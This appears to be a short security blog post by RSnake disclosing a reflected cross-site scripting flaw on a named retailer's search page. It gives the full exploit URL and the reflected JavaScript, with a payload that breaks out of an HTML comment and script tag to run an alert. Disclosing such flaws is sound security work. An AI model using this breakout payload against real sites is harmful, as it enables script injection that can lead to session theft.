http://www.michaels.com/art/online/search?pageNumber=1&channel=0&search=yes&keywords=--%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&type=0&x=0&y=0
Another interesting one where I had to jump out of the comment to end the script tag. People who write well formed JavaScript are a rare breed these days. I almost forgot what it's really supposed to look like (minus my vector of course):
<script language="javascript1.1">
<!--
var cm = new _cm("tid", "1", "vn2", "e3.1");
cm.pi = getFileNameFromURL();
cm.se = "--></script><script>alert(String.fromCharCode(88,83,83))</script>";
cm.writeImg();
//-->
</script>
- RSnake
Gotta love it.
http://ha.ckers.org